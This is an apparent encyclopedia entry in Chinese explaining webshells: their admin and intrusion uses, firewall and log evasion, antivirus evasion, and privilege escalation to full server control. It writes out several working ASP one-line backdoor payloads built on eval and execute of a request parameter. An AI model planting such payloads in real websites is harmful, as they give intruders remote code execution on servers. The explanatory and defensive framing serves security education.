webshell
百科名片
顧名思義,“web”的含義是顯然需要服務器開放web服務,“shell”的含義是取得對服務器某種程度上操作權限。webshell常常被稱爲匿名用戶(入侵者)通過網站端口對網站服務器的某種程度上操作的權限。由於webshell其大多是以動態腳本的形式出現,也有人稱之爲網站的後門工具。
產品及服務
一方面,webshell可以被站長常常用於網站管理、服務器管理等等。根據FSO權限的不同,作用有在線編輯網頁腳本、上傳下載文件、查看數據庫、執行程序命令(視webshell權限而定)等。
另一方面,被入侵者利用,從而達到控制網站服務器的目的。這些網頁腳本常稱爲webshell。
腳本木馬,目前比較流行的asp或php木馬,也有基於.NET的腳本木馬。
當然,也不排除白帽子黑客對網站的安全檢測(即我們說的“紅客”)。
優點
webshell 最大的優點就是可以穿越防火牆,由於與被控制的服務器或遠程主機交換的數據都是通過80端口傳遞的,因此不會被防火牆攔截。並且使用webshell一般不會在系統日誌中留下記錄,只會在網站服務器的日誌中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕跡的。
webshell的隱蔽性
有些惡意網頁腳本可以嵌套在正常網頁中運行,且不容易被查殺。
webshell可以穿越服務器防火牆,由於與被控制的服務器或遠程主機交換的數據都是通過80端口傳遞的,因此不會被防火牆攔截。
並且使用webshell一般不會在系統安全日誌中留下記錄,只會在網站的web日誌中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕跡的。
雖然很多後門都可以被殺毒軟件等檢查出來,但是很多入侵者會把webshell後門代碼加密等處理,以使webshell免於被查殺,這稱爲免殺技術,相應的後門被成爲免殺後門
常見webshell
提到webshell,那就一定要提到“海陽頂端網asp後門”這應該是asp後門中最有名的了,後面還有“殺手十三”等功能豐富的後門出現!
一句話後門 <%eval request("value")%> 或者 <%execute request("value")%> 或者 <%execute(request("value"))%> 或者他們的加密變形!
當然webshell還有jsp,php,aspx等多種腳本形式的。
常見問題
如何防範惡意後門?從根本上解決動態網頁腳本的安全問題,要做到防注入、防暴庫、防COOKIES欺騙、防跨站攻擊等等,務必配置好服務器FSO權限。
希望看過本詞條的人,希望您們能到百度的“webshell”貼吧進行討論。
webshell是什麼?
webshell是web入侵的腳本攻擊工具。簡單的說來,webshell就是一個asp或php木馬後門。
黑客在入侵了一個網站後,常常在將這些asp或php木馬後門文件放置在網站服務器的web目錄中,與正常的網頁文件混在一起。
然後黑客就可以通過web的方式,通過asp或php木馬後門控制網站服務器,包括上傳下載文件、查看數據庫、執行程序命令等。
爲了更好理解webshell我們學習兩個概念:
問:什麼是“木馬”?
答:“木馬”全稱是“特洛伊木馬(Trojan Horse)”。原指古希臘士兵藏在木馬內進入敵方城市從而佔領敵方城市的故事。
在互聯網上,“特洛伊木馬”指一些程序設計人員在其可從網絡上下載(Download)的應用程序或遊戲中,包含了可以控制用戶的計算機系統的程序,可能造成用戶的系統被破壞甚至癱瘓。
問:什麼是後門?
答:大家都知道,一臺計算機上有65535個端口,那麼如果把計算機看作是一間屋子,那麼這65535個端口就可以它看做是計算機爲了與外界連接所開的65535扇門。每個門的背後都是一個服務。有的門是主人特地打開迎接客人的(提供服務),有的門是主人爲了出去訪問客人而開設的(訪問遠程服務)。
理論上,剩下的其他門都該是關閉着的,但偏偏由於各種原因,很多門都是開啓的。
於是就有好事者進入,主人的隱私被刺探,生活被打擾,甚至屋裏的東西也被搞得一片狼跡。
這扇悄然被開啓的門就是“後門”。
問:什麼是網站提權
答:所謂網站提權,是入侵者得到webshell以後,通過webshell得到服務器的一些信息,查看並分析其中可能存在的漏洞來提升權限
最終通過3389端口,serv-u或pcAnywhere等終端工具連接到服務器,取得網站服務器最高管理權限。
問:如何尋找webshell?
答:關注您所留意的各種程序的漏洞,進行深入瞭解,防範腳本攻擊,注入工具。
